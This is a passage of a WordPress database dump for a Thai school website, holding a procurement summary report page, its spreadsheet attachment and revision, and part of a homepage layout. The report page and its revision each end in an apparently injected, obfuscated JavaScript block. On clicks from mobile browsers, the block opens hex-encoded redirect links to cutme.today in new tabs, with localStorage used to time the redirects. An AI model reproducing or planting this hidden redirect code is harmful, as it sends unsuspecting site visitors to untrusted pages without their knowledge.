'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad','','','2024-08-15 11:47:32','2024-08-15 04:47:32','',0,'http://pakhaeng.ssk.in.th/?page_id=855',0,'page','',0),
(856,1,'2024-08-15 11:46:45','2024-08-15 04:46:45','','o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','','closed','','o17%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89','','','2024-08-15 11:46:45','2024-08-15 04:46:45','',855,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),
(857,1,'2024-08-15 11:47:31','2024-08-15 04:47:31','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:html -->\n<iframe src=\"https://onedrive.live.com/embed?resid=204B2AF26790FE9B%21144&authkey=!AEPBY7T23e8S_mk&em=2\" width=\"1500\" height=\"500\" frameborder=\"0\" scrolling=\"no\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:file {\"id\":856,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-0909a419-cdc4-40ee-9044-86145bb0456e\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\">รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/o17รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0909a419-cdc4-40ee-9044-86145bb0456e\">Download</a></div>\n<!-- /wp:file --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานสรุปผลการจัดซื้อจัดจ้างหรือจัดหาพัสดุ','','inherit','closed','closed','','855-revision-v1','','','2024-08-15 11:47:31','2024-08-15 04:47:31','',855,'http://pakhaeng.ssk.in.th/?p=857',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(858,1,'2024-08-15 11:47:56','2024-08-15 04:47:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0